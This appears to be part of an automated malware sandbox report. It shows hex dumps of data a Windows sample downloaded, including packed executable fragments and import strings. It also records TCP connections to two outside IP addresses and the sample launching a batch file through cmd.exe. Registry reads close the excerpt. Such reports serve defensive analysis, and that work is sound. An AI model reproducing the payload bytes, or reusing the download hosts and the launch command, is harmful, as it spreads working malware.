1ab7 fa57 e61a 76c3 e8b7 91b9 ad62 1dff    ...W..v......b..
0bff ff69 69b0 adb5 f611 b187 236d 2f33    ...ii.......#m/3
73bc fbd3 2378 2d6d 6f7a c32e 6a2d 16a0    s...#x-moz..j-..
ff70 65c2 072e 028d f367 4d33 d7ff 0dfe    .pe......gM3....
ffb5 be00 0863 910b 2f69 0168 05b6 ce83    .....c../i.h....
e65e 647e 710a 7cac 60ff 1bff ff1e 541b    .^d~q.|.`.....T.
7468 756d b604 daa3 b505 3580 43ba cdd7    thum......5.C...
567b 69c3 6d6d 7b5f f88d 85d1 8759 f4b9    V{i.mm{_.....Y..
0e63 794c 7177 f6f6 05c5 ffdf ea09 79e7    .cyLqw........y.
c562 1e2f b885 eeb9 5e3f e302 2bb3 63ff    .b./....^?..+.c.
ffff bf93 b535 627c 7d56 7730 e393 c0ac    .....5b|}Vw0....
6161 1264 444b 3207 1961 f930 3020 4f4b    aa.dDK2..a.00 OK
43ff ffff c6a8 43aa 0e6f 6bad 6fc5 b4ae    C.....C..ok.o...
2c09 c468 a6b2 ed09 6d75 122d 9268 77ff    ,..h....mu.-.hw.
ffff ffee 9439 4c33 706f 1f11 636b 3db1    .....9L3po..ck=.
0d33 b430 2d9e 0c29 452b 6ded 831a 2053    .3.0-..)E+m... S
756e 1aff ffff ff75 4a04 79de b502 db7a    un.....uJ.y....z
3111 0502 2047 4d54 e792 cdd8 2650 3573    1... GMT....&P5s
625c 0f5a e12e bcff ffff ff2d 5479 7317    b\.Z.......-Tys.
d7c2 76d9 8d2f 426d 6c18 4c04 674c f7f1    ..v../Bml.L.gL..
72b5 1afb c689 3c21 47a2 19ff ffad d0da    r.....<!G.......
3e16 383e 4cac cd6e 866f 7c28 3c2f 0e07    >.8>L..n.o|(</..
1c6c bd2f f1ad ff76 e162 9679 2048 1d63    .l./...v.b.y H.c
92b7 ed0d d017 2922 16bf fdff ff66 f86d    ......)".....f.m
207f 5cc1 f0f6 3c16 2f22 208c 4621 68d0     .\...<./" .F!h.
5ef7 e0e6 1f06 2b56 8a76 5be2 ffb5 5f63    ^.....+V.v[..._c
7074 3e0a 66d2 2a26 ed36 4a16 98ce dffe    pt>.f.*&.6J.....
dffe 4228 dbdf 288c f82c bd2c 2cb7 2920    ..B(..(..,.,,.) 
7b0a b930 8509 d220 28ff ffff ff0c 0947    {..0... (......G
7220 739b fbf6 203d ef65 7720 440a 7d3b    r s... =.ew D.};
1814 c65a 61c7 ab74 54c2 110c 67ff ffff    ...Za..tT...g...
fff8 fed8 4129 2b3f 2a32 342a 3630 0231    ....A)+?*24*60.1
17a4 176b 4329 344d 8050 85d8 366c 223b    ...kC)4M.P..6l";
0cff 56eb ffb5 2b42 cc8d 190a 0d61 53a8    ..V...+B.....aS.
67f7 0dd9 b620 6c63 20ff ff8d ff36 2219    g.... lc ....6".
7b8f ad51 d63d 21a7 c99e 838d b9dd cb2b    {..Q.=!........+
2249 cf2b 2f2b a15b bcf5 ff2b b075 6470    "I.+/+.[...+.udp
5a68 3235 7d06 2ced 2c05 64cc ddff 421b    Zh25}.,.,.d...B.
ff83 fd5e 660c 4551 4ee4 20bc 84cc 1566    ...^f.EQN. ....f
19eb 15ff ff7f 8b76 1950 2a00 7fab 2827    .......v.P*...('
3b27 adeb 765f c171 3a2a 6929 303b 06f1    ;'..v_.q:*i)0;..
05fe ff3c 35e1 17a1 8576 fc0e 2b2b 54fd    ...<5....v..++T.
f0e6 1a23 1c5b 69bf fdff 2f9a 7768 6942    ...#.[i.../.whiB
dbb6 ad25 3b63 5668 1a41 502e b589 b51d    ...%;cVh.AP.....
1e27 01ff bff5 8d29 a79b b927 2c20 1631    .'.....)...', .1
2c0e 5273 f6b6 b9c3 ae37 19ff ff7f a164    ,.Rs.....7.....d
7066 28be a2d4 5c6c 3d43 e47e 82cd 1256    pf(...\l=C.~...V
b83e 2040 a160 edff 02bf d1c2 4a4e 307a    .> @.`......JN0z
1909 a158 2d75 09ce b184 24ff ff8d ffe1    ...X-u....$.....
9643 6b5b 6461 0170 5423 1ed6 a2d0 0e70    .Ck[da.pT#.....p
29bb cacd 68ad bbbd 0ffc ff17 fe1d 207d    )...h......... }
ef74 e0ae 2518 766d 2426 7794 7bbb cd25    .t..%.vm$&w.{..%
4b98 2703 2d5e e0ff 4bdc e0d9 84d8 d92c    K.'.-^..K......,
3d98 423e 1592 7124 1565 37f8 ffdf ac26    =.B>..q$.e7....&
9bcc 383e 1236 819d 6b30 2383 d12e 6897    ..8>.6..k0#...h.
3702 9d97 fa6f fd3f 27ea 6dad 6ca8 7527    7....o.?'.m.l.u'
5199 204c 86eb 0acf 63ff ffff ff09 50e2    Q. L....c.....P.
4d48 97b3 34ef 52ab d09b 667b d4a3 7c7c    MH..4.R...f{..||
2e58 086c 60c7 9192 e14f cb18 fbff ffff    .X.l`....O......
46c5 5b30 5ddf 07c2 98e3 6d87 787d c966    F.[0].....m.x}.f
82d5 3ab8 6135 ca0f 09d2 7fa9 a581 dad5    ..:.a5..........
835c 7f87 3f20 f094 a817 f6bf fdff 3330    .\..? ........30
3220 4d28 5857 a36f 12a9 4c49 6291 757e    2 M(XW.o..LIb.u~
e568 28b0 af09 ffff ffff 8570 e344 a457    .h(........p.D.W
2abd 5697 4b09 3de0 b9d8 6aa5 4d49 9c68    *.V.K.=...j.MI.h
eb6a c89f b880 613e b737 faff ff50 4f53    .j....a>.7...POS
543d 3ad4 f005 4400 a79d f215 68e8 1717    T=:...D.....h...
00d2 ff31 2869 e317 f8d0 2828 7d27 09b8    ...1(i....((}'..
13a7 33c8 e72f e7ff 7fe9 7f1f 201f 7808    ..3../...... .x.
225b e19d 424d 133a a2c4 56ce 4f6b ac6c    "[..BM.:..V.Ok.l
9ecd d617 f81b fc5e 44b7 81a5 6cee 8e72    .......^D...l..r
8b67 5f47 5456 6f17 f81b fdb9 9dca 3012    .g_GTVo.......0.
db41 d95d 1d89 d703 b5de 64fe 16f0 ff72    .A.]......d....r
4b00 f13e 6a85 64c5 8f78 334e 08b6 632c    K..>j.d..x3N..c,
63f1 1bfc ff97 fd03 e6f6 d4d8 6d63 662e    c...........mcf.
5c64 6963 5dc1 3d1a 0bff ff4b ff28 9e7e    \dic].=....K.(.~
56aa a9d6 66b4 a7db 4d6d 8ebe 45a7 4274    V...f...Mm..E.Bt
5c57 00b7 6f43 eefe ffff ffd8 d60e a71b    \W..oC..........
b273 835c 52cf 73cf 75b1 7053 b865 4a51    .s.\R.s.u.pS.eJQ
0a91 ea9e d458 ca78 984d ffff ff05 f153    .....X.x.M.....S
77ba b619 0d52 7233 5463 3f8b 859c ab58    w....Rr3Tc?....X
fd2b 45fb f823 d7fb ffff ff90 2e72 d0d1    .+E..#.......r..
444c 4ca0 2aa4 5a10 4d0e 1045 480d e4b8    DLL.*.Z.M..EH...
7555 1304 bc40 0201 b945 51e0 7f0b 4481    uU...@...EQ...D.
b5a0 4109 4d75 e106 2fb1 b185 745d 7976    ..A.Mu../...t]yv
546f 57ce                                  ToW.
Data received: 
    
fbff bfc4 656a 1443 e60a 7e05 9c54 687e    ....ej.C..~..Th~
0def 4a41 1b28 9930 e12d 165a 7d74 4cb0    ..JA.(.0.-.Z}tL.
7d00 3c45 e4ff ffff ff6f 720d 456e 7669    }.<E.....or.Envi
0b6e e1da 5b53 9356 3c69 6162 5826 2202    .n..[S.V<iabX&".
f616 f361 6e64 1b60 ecff bfc4 ff61 477d    ...and.`.....aG}
7341 4f46 6927 436b b9a6 d748 2a0d 0c53    sAOFi'Ck...H*..S
047b 17b1 55bf c1ff ffc9 0191 4c69 6272    .{..U.......Libr
4de2 0de8 6c79 7050 6441 6495 88b1 2576    M...lypPdAd...%v
7325 dea2 d10f 5400 5941 beb5 84ff ffbf    s%....T.YA......
c54c 4485 65df 11f6 fff6 d33c 3f3f 48a2    .LD.e......<??H.
6440 4059 413f 4156 3f89 ffff ff24 62b0    d@@YA?AV?....$b.
b4c7 20b6 315f a940 4455 1036 a0d6 440e    .. .1_.@DU.6..D.
5f0e 8773 0762 d3ff 12bf 750f 400b 616c    _..s.b....u.@.al
34bb fdda d713 3211 3040 418d fe85 ff42    4.....2.0@A....B
5631 0550 420e 592b d55a 536b 274c 6cf7    V1.PB.Y+.ZSk'Ll.
bfff ffdf f816 5142 4549 0749 4f2a db4c    ......QBEI.IO*.L
4565 3965 5289 c0dc 9b48 a60f 53a9 b2ff    Ee9eR....H..S...
0bb4 f89f bd49 a8a7 4da2 f954 76b2 f741    .....I..M..Tv..A
4541 41ff adff ffa5 553f 3150 5176 e37b    EAA.....U?1PQv.{
4058 475f 0c64 799c 90f6 7241 585f 4eeb    @XG_.dy...rAX_N.
73ad ffff ff73 6967 6e0c c284 1097 ed6e    s....sign......n
fba2 ac54 3f57 3249 42a1 9026 8c02 f7ff    ...T?W2IB..&....
ffff ff4f 3e5c 0a4e 8b30 5f43 f66a 6d86    ...O>\.N.0_C.jm.
40e4 064e 626f b2fa 827b 5143 415c f040    @..Nbo...{QCA\.@
3444 426e d1e0 ffa0 ada7 59e7 1d70 5f28    4DBn......Y..p_(
6a51 7cd8 5f66 b0c0 ff37 0176 0d56 4842    jQ|._f...7.v.VHB
e176 1bf1 6d0a 5faa 52d4 dfe0 6f31 05d7    .v..m._.R...o1..
6923 314d fce5 32e1 f95c 17ff 5fe2 ad3c    i#1M..2..\.._..<
74f3 866e a433 8bd8 7aae 5817 16ab 6d59    t..n.3..z.X...mY
9fff 0285 fe1b eb9a 0880 6905 61ee 35b6    ..........i.a.5.
c54a 5a35 b4f8 ff7f 8b72 9dec 6031 b7a1    .JZ5.....r..`1..
6b2f ad4e 7079 08ae 2bb7 5c02 cc66 5fea    k/.Npy..+.\..f_.
ff56 a715 efd6 96ba 747c 5f53 5f0b e367    .V......t|_S_..g
9d9f 0dde a2c4 ffd6 f643 7878 46f6 6df9    .........CxxF.m.
72dc 28b6 6667 d502 ff25 906e 6b5f c0d7    r.(.fg...%.nk_..
283d 8187 41ff ff5f a893 702a be42 b425    (=..A.._..p*.B.%
61d5 114d 26e0 5a5b 0e68 8412 f9b2 dbb7    a..M&.Z[.h......
6854 e00c b8c7 7135 ee10 6dff ff7f 8326    hT....q5..m....&
1ba8 e149 1b69 bc7a 3481 6d32 0344 2541    ...I.i.z4.m2.D%A
8252 45b2 72d9 82b7 ff17 f89b 652d 552f    .RE.r.......e-U/
36cd 426f 32d0 ff02 0209 40dd ec7e 3fa5    6.Bo2.....@..~?.
7fe3 ffdc 5348 4756 661b f235 1641 0522    ....SHGVf..5.A."
4bfb 36d0 9de8 b5fd 7fbb c5b6 619e 54f2    K.6.........a.T.
e4a0 5ab8 8a12 892f 9b35 a050 54ff bfd4    ..Z..../.5.PT...
bf74 4469 1b66 2a0a 34a5 7f2c db90 6656    .tDi.f*.4..,..fV
fc02 1715 b22c cb11 edef feb2 010d 0413    .....,..........
16cb 0903 340c 7473 10ff 000b b7fa 0ba0    ....4.ts........
0f0a 0c0a 2a0f 601c 12f1 0bff ffd2 ff0a    ....*.`.........
060b 0d05 0a07 120e 1e64 eebf fc06 2905    .........d....).
150a 050b 0e05 1707 056f ffff ff16 170b    .........o......
080a 14ff 7ffb 5f19 3ef0 d401 2a25 1514    ......_.>...*%..
0017 2021 0e13 211a 07df 68fd ff16 0510    .. !..!...h.....
111f ffdf 6edb 0d09 3c1b 0261 5213 0a09    ....n...<..aR...
2df8 6fb0 f50d 3833 4fbc 098e dbff 1610    -.o...83O.......
2126 0729 ff6f f0b7 4a0f 1859 1d0d 224c    !&.).o..J..Y.."L
075b 2406 7fbb b9ff 0907 0bb7 ffff ff07    .[$.............
2417 534e 1562 1b1a 0b5c 0607 1b09 3f06    $.SN.b...\....?.
eeb0 5bfb 0c08 1312 ad4f 0fff 46ff ff11    ..[......O..F...
0606 22df 5afb ef12 290b 052f 0714 12ca    ..".Z...)../....
67b1 2111 0e0f fdff 56ff 6f87 ff08 0d1e    g.!.....V.o.....
1509 0884 0715 15cf 0f1f 0e18 1844 07ff    .............D..
4bfc ff9c 3217 1832 8229 ddf6 77ad 3b0f    K...2..2.)..w.;.
38d6 1013 0f21 acb6 05c4 16d2 ffff fffe    8....!..........
db5b 6b45 de17 1b15 4125 5416 193c 1419    .[kE....A%T..<..
700c ff77 7bf6 2300 0782 a916 4bfc 2257    p..w{.#.....K."W
0905 08d9 0862 32ed ffff 7ffe cd1a 1f12    .....b2.........
1240 078d 0709 210a a215 cf07 5ded bfd0    .@....!.....]...
151e 0a18 e5c4 42e9 ff27 135c 2466 0b23    ......B..'.\$f.#
0cdb de7e 0814 32ff ff56 bf12 15d9 060a    ...~..2..V......
7616 897f 6bbf 7d0c 0f3d 7f50 0911 1918    v...k.}..=.P....
10fd 0d2e f5af 3107 0eb9 2d07 656d ec10    ......1...-.em..
170d 0140 e1ff bf10 13f3 1508 0e47 bdbd    ...@.........G..
fc5b 000e 0b0b 090f 1d0b bfc5 2fdd 7735    .[........../.w5
0c19 bfd1 df03 350e 1995 26fc f6bf f00e    ......5...&.....
1714 2745 1112 1606 12ff 76bb 7515 5b26    ..'E......v.u.[&
371c 07fd ffed 2f77 440c 2730 082e ac5d    7...../wD.'0...]
f7ff ec07 0c15 102c 2a07 f0f8 0097 f8b7    .......,*.......
6a65 8b10 3ebe 0a0a 7208 7c58 bbff ffed    je..>...r.|X....
ff25 6b7c dba0 2808 3e0e 76a1 5511 111e    .%k|..(.>.v.U...
238d 1618 090b 7fa1 fd08 0b1e 1cfe 05fe    #...............
ff06 68f3 230a 160b 1c4b 2ff0 e36f eeff    ..h.#....K/..o..
38bc 0f4e 1319 0f19 5297 fadf c3b0 2125    8..N....R.....!%
0c40 060e 081d 953b 87a5 ffbf d4ff 0d0a    .@.....;........
1538 2212 5c35 7b55 6500 130c 0c05 0f02    .8".\5{Ue.......
a233 1009 00f0 ffdf dadb 97d2 8a0c 1418    .3..............
f071 5f08 6133 17ec 080c 1c02 0015 e5ff    .q_.a3..........
bf32 586b dd6d 01f0 a00e 0400 0305 541c    .2Xk.m........T.
7b6f bfab f86f 6883 047c bb47 4c01 0769    {o...oh..|.GL..i
58e0 ce9a ed8d fa7f ab68 4a65 0c38 2813    X........hJe.8(.
87ec 0064 a2c9 b0ff ffdf da4c b099 100b    ...d.......L....
0204 3307 826c 4fba 0c90 93f8 2a03 b33d    ..3..lO.....*..=
5bf6 ffff                                  [...
Data received: 
    
ffff 0207 06b0 5c07 3f04 9280 6568 53b4    ......\.?...ehS.
d1ad 426e 4531 8c05 06e8 0adb a754 011e    ..BnE1.......T..
2efc 025b fcff 36b0 c176 0718 3690 38c4    ...[..6..v..6.8.
0237 57f4 8e60 9802 7fa1 c650 19bf 21dd    .7W..`.....P..!.
200e 273c 8ca3 ff97 fe36 d8f7 5e2e 261a     .'<.....6..^.&.
6053 4a27 db0e 6c53 c04f 6551 adff df62    `SJ'..lS.OeQ...b
06d0 9434 dd27 085a 421b 7000 8037 b7f1    ...4.'.ZB.p..7..
ccb3 8af6 f286 a889 a88c 40ff ade2 f2df    ..........@.....
187c 2408 010f 85d9 0160 be00 d80b 40db    .|$......`....@.
108d 0590 eaeb 1090 00fa 5bf0 ff8a 0646    ..........[....F
8807 4701 db75 078b 2cfc 11db 72ed b8dc    ..G..u..,...r...
0e98 8953 1111 c00c 73ef b7fe c15a 0b0e    ...S....s....Z..
73e4 31c9 83e8 0339 c1e0 07f6 06bb 083d    s.1....9.......=
83f0 1a74 89c5 2fc9 b090 3d61 0c75 2041    ...t../...=a.u A
1c4c fa16 ed9f 83c1 0281 fd00 f392 1101    .L..............
8d14 2f37 7df7 1709 fc76 0f8a 0242 9449    ../7}....v...B.I
75f7 e963 ca90 8b02 ee7f a1f8 83c2 0489    u..c............
07e9 83e9 0477 f101 cfe9 4c16 bf7b a1fa    .....w....L..{..
5e89 f7b9 0057 eb32 8a1a 013c 8072 0a3c    ^....W.2...<.r.<
ffff 42ff 8f77 0680 7ffe 0f74 59e8 3c01    ..B..w.....tY.<.
7723 803f 0175 1e8b 0766 c1e8 63c3 0aff    w#.?.u...f..c...
08c1 c010 86c4 29f8 d547 34e2 ffdb c3b7    ......)..G4.....
d709 017f bf8d 1900 2809 c074 458b 5f04    ........(..tE._.
8d84 77a9 b6e1 3000 a002 f350 22d7 96b4    ..w...0....P"...
0bdb d2b7 5b95 2e47 081d dc89 f979 e9b7    ....[..G.....y..
0b50 ff9d d9fe 47b9 5748 f2ae 551d b837    .P....G.WH..U..7
0789 0383 c304 ebd8 61ef 5cbb fb31 c0c2    ........a.\..1..
0c00 628d 5efc 0a35 1b22 3cef 77a5 bb58    ..b.^..5."<.w..X
fb11 01c3 8b03 8186 8403 ebe2 d973 6fdd    .............so.
0b40 1066 8b86 020c 8bae bc47 876f 19a0    .@.f.......G.o..
adf0 d8bb 83ec 6a04 53f6 1b34 fc57 ffd5    ......j.S..4.W..
8d87 1fd0 805b 8060 287f 5815 ff05 8adf    .....[.`(.X.....
5014 5861 f780 6a00 39c4 75fa 8355 9909    P.Xa..j.9.u..U..
faec 80e9 7e97 fa00 7321 b753 04b1 13b4    ....~...s!.S....
b011 43d2 0c49 cc1d d428 24cd 9034 dc32    ..C..I...($..4.2
e4d2 0c49 333f ec4b f4b9 c036 4356 fcb0    ...I3?.K...6CV..
a760 9d6d 9aae 6e03 7e8e 9cb1 17aa 34c8    .`.m..n.~.....4.
2083 07f2 f809 e4e4 c9cf 0017 06b2 14b2     ...............
10fe 3bfa 1f4b 4552 4e45 4c33 322e cb00    ..;..KERNEL32...
4d53 5643 5036 302e 51ec e7aa 280b 5254    MSVCP60.Q...(.RT
0aec 853e b73b 6520 094f da41 5554 0ced    ...>.;e .O.AUT..
d86f 117a 4c57 4150 490b 5553 4785 06fb    .o.zLWAPI.USG...
6016 5753 325f 0a00 1429 e0a3 4206 9361    `.WS2_...)..B..a
a51d 6dd4 d1e6 50de 6397 72d7 e85d a165    ..m...P.c.r..].e
e7e7 6972 7475 5913 6db2 5240 74c9 0f41    ..irtuY.m.R@t..A
3974 d826 6b24 0d46 2b65 3bff 8d3a 6a30    9t.&k$.F+e;..:j0
a361 1d63 5f73 7472 696e 67b8 6d37 47a6    .a.c_string.m7G.
1063 6859 5f0e 6169 91a3 b6b5 b80f 4018    .chY_.ai......@.
cebb 56c0 d7ca 6140 611a 1332 4054 6bfe    ..V...a@a..2@Tk.
6716 5141 4540 585a 0000 6905 b9db 56a8    g.QAE@XZ..i...V.
0e88 3369 2869 7a5c 3305 b4ae c899 560c    ..3i(iz\3.....V.
03a5 5eac 901b 4d9e 420d 0076 3645 0fb5    ..^...M.B..v6E..
f656 b203 b2a1 594e 4cb2 5054 5b96 3cb9    .V....YNL.PT[.<.
83b9 c860 f8fe 736d 0e40 2e00 749a 0c6c    ...`..sm.@..t..l
2d3a 80c5 822a f63a 580d 547c a801 4655    -:...*.:X.T|..FU
2b01 97ef 644e 4d07 ab21 d9aa 8947 0101    +...dNM..!...G..
656b e5a0 0901 e14f 2a95 e8ad 0643 0973    ek.....O*....C.s
6548 382f f6ca ad0d 2752 6517 4108 26db    eH8/....'Re.A.&.
daa9 53fe 2345 6130 57bb cd66 ad5b 0b75    ..S.#Ea0W..f.[.u
0372 7376 d88f dd0e 5305 6570 3b4d 6f64    .rsv....S.ep;Mod
756c 5660 ad6e 2f33 2845 78c1 1adf 6eef    ulV`.n/3(Ex...n.
2f31 4e61 6d1c 9c63 6b78 736f 7572 b2df    /1Nam..ckxsour..
b2d9 6365 aa0d 7f6f 660f c067 c3de 710d    ..ce...of..g..q.
e753 7461 cdc2 5b2d 0570 ad66 6f41 1089    .Sta..[-.p.foA..
50bd dd07 3803 636d 8d5f 77b0 6ed0 12bd    P...8.cm._w.n...
073f 3f33 c958 cf40 5a3a f339 d70d 1e02    .??3.X.@Z:.9....
1532 1449 e176 01c6 1570 3874 6608 6663    .2.I.v...p8tf.fc
164b 05c9 dc07 1048 6e77 7b07 6806 1c3c    .K.....Hnw{.h..<
7f68 725b b956 7565 6578 0658 12d1 d7da    .hr[.Vueex.X....
60ae 6613 1261 7cfb 31e6 6eed 765f 5f67    `.f..a|.1.n.v__g
a46d 6145 a667 730e 08b9 cbd7 b51e 276d    .maE.gs.......'m
1973 7573 0bd1 b6bd b655 6805 4efa 6a10    .sus.....Uh.N.j.
7421 e0ed 3b96 1f70 0263 6f6d 149b 1b36    t!..;..p.com...6
980d 660b 392c 7025 20d6 6e11 7479 9686    ..f.9,p% .n.ty..
576c 663b 6c11 686f 4933 376e 169e 3b2f    Wlf;l.hoI37n..;/
006f 6c66 2c37 1d94 9137 fc69 b845 6e75    .olf,7...7.i.Enu
6d93 646f 7773 d01a 1c67 0b54 4054 50f9    m.dows...g.T@TP.
6f40 2109 dffb 4054 6f4f f201 21e0 656d    o@!...@ToO..!.em
4112 0400 5b4b 3c5b 9e03 0f01 0e46 13df    A...[K<[.....F..
1a64 b32c 0412 1020 4000 01ef b323 800c    .d.,... @....#..
1b4d 011e bac3 4608 1200 dc4f 500b 04d2    .M....F....OP...
c152 6036 4b57 3982 81ac cc1e 2eac 52f6    .R`6KW9.......R.
05db 0770 0c90 eb04 425b 2362 815c 6451    ...p....B[#b.\dQ
1bbe 640b e03b fb06 ea12 d3dc 628f 402e    ..d..;......b.@.
2627 8c07 30c6 3625 4d08 18c0 4f73 6bca    &'..0.6%M...Osk.
5e33 d800 eb40 3857 4f6e 6643 c0aa f821    ^3...@8WOnfC...!
2f00 0000 0000 0000 0009 00ff 0000 0000    /...............
60be 0060 4000 8dbe 00b0 ffff 57eb 0b90    `..`@.......W...
8a06 4688 0747 01db 7507 8b1e 83ee fc11    ..F..G..u.......
db72 edb8 0100 0000 01db 7507 8b1e 83ee    .r........u.....
fc11 db11 c001 db73 ef75 098b 1e83 eefc    .......s.u......
11db 73e4                                  ..s.
Data received: 
    
31c9 83e8 0372 0dc1 e008 8a06 4683 f0ff    1....r......F...
7474 89c5 01db 7507 8b1e 83ee fc11 db11    tt....u.........
c901 db75 078b 1e83 eefc 11db 11c9 7520    ...u..........u 
4101 db75 078b 1e83 eefc 11db 11c9 01db    A..u............
73ef 7509 8b1e 83ee fc11 db73 e483 c102    s.u........s....
81fd 00f3 ffff 83d1 018d 142f 83fd fc76    .........../...v
0f8a 0242 8807 4749 75f7 e963 ffff ff90    ...B..GIu..c....
8b02 83c2 0489 0783 c704 83e9 0477 f101    .............w..
cfe9 4cff ffff 5e8d be00 7000 008b 0709    ..L...^...p.....
c074 3c8b 5f04 8d84 3060 a000 0001 f350    .t<._...0`.....P
83c7 08ff 96b0 a000 0095 8a07 4708 c074    ............G..t
dc89 f957 48f2 ae55 ff96 b4a0 0000 09c0    ...WH..U........
7407 8903 83c3 04eb e1ff 96c4 a000 008b    t...............
aeb8 a000 008d be00 f0ff ffbb 0010 0000    ................
5054 6a04 5357 ffd5 8d87 0702 0000 8020    PTj.SW......... 
7f80 6028 7f58 5054 5053 57ff d558 618d    ..`(.XPTPSW..Xa.
4424 806a 0039 c475 fa83 ec80 e97a 7aff    D$.j.9.u.....zz.
ff00 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0100 0000 5800 0080    ............X...
1800 0080 0000 0000 0000 0000 0000 0000    ................
0000 0100 0100 0000 3000 0080 0000 0000    ........0.......
0000 0000 0000 0000 0000 0100 0904 0000    ................
4800 0000 6040 0000 0036 0000 0000 0000    H...`@...6......
0000 0000 0300 4400 4c00 4c00 0000 0000    ......D.L.L.....
0000 0000 0000 0000 dcb0 0000 b0b0 0000    ................
0000 0000 0000 0000 0000 0000 e9b0 0000    ................
ccb0 0000 0000 0000 0000 0000 0000 0000    ................
f4b0 0000 d4b0 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 feb0 0000    ................
0cb1 0000 1cb1 0000 2cb1 0000 3ab1 0000    ........,...:...
48b1 0000 0000 0000 56b1 0000 0000 0000    H.......V.......
5cb1 0000 0000 0000 4b45 524e 454c 3332    \.......KERNEL32
2e44 4c4c 004d 5356 4352 542e 646c 6c00    .DLL.MSVCRT.dll.
5553 4552 3332 2e64 6c6c 0000 4c6f 6164    USER32.dll..Load
4c69 6272 6172 7941 0000 4765 7450 726f    LibraryA..GetPro
6341 6464 7265 7373 0000 5669 7274 7561    cAddress..Virtua
6c50 726f 7465 6374 0000 5669 7274 7561    lProtect..Virtua
6c41 6c6c 6f63 0000 5669 7274 7561 6c46    lAlloc..VirtualF
7265 6500 0000 4578 6974 5072 6f63 6573    ree...ExitProces
7300 0000 6174 6f69 0000 4368 6172 546f    s...atoi..CharTo
4f65 6d41 0000 0000 0000 0000 0000 0000    OemA............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000              ............

  -  TCP Connection Attempts:  
from ANUBIS:1034 to 58.241.255.37:80
from ANUBIS:1036 to 212.58.23.82:80

4. cmd.exe

  - General information about this executable  
Analysis Reason: Started by sample.exe 
Filename: cmd.exe 
MD5: 6d778e0f95447e6546553eeea709d03c 
SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1 
File Size: 389120 Bytes
Command Line: cmd /c c:\353454543.bat 
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

4.a) cmd.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​Software\​Microsoft\​Command Processor  AutoRun   
HKLM\​Software\​Microsoft\​Command Processor  CompletionChar  64 
HKLM\​Software\​Microsoft\​Command Processor  DefaultColor 
HKLM\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKLM\​Software\​Microsoft\​Command Processor  PathCompletionChar  64 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
